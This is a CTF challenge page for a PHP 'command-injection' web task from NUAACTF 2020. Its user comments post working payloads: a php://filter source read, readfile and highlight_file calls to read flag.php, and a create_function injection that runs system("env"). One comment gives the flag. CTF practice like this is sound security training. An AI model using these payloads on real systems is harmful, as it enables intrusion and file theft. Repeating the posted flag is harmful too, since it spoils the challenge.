command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 367
提  示:
描  述:
nuaactf{}
评论
i11us0ry 2月前

考点:文件包含、目录扫描、代码审计 /include.php?file=createfun&func=readfile&arg=flag.php

回复 0

solomom 8月前

csdn

回复 0

smtall 1年前

createfun.php?func=highlight_file&arg=flag.php

回复 0

vincentshine 1年前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 2年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 2年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 2年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 2年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 2年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 2

hopeinhand 2年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(1)

解题动态

caixinggang 攻破了该题 8小时前
AWDAI 攻破了该题 4天前
阿斯蒂芬123 攻破了该题 8天前
nihao123@ 攻破了该题 8天前
vx606v 攻破了该题 9天前
ysecer8 攻破了该题 10天前
WWls= 攻破了该题 11天前
Mu'S'iC 攻破了该题 12天前
wooluo 攻破了该题 13天前
999哲111 攻破了该题 13天前
gc 攻破了该题 15天前
GrantFly 攻破了该题 16天前
123test 攻破了该题 18天前
一条大菜狗123 攻破了该题 19天前
zant 攻破了该题 20天前
hell0-hnc 攻破了该题 21天前
NeoVagabond 攻破了该题 21天前
gdai 攻破了该题 29天前
kxzzy 攻破了该题 1月前
tessst 攻破了该题 1月前
问题反馈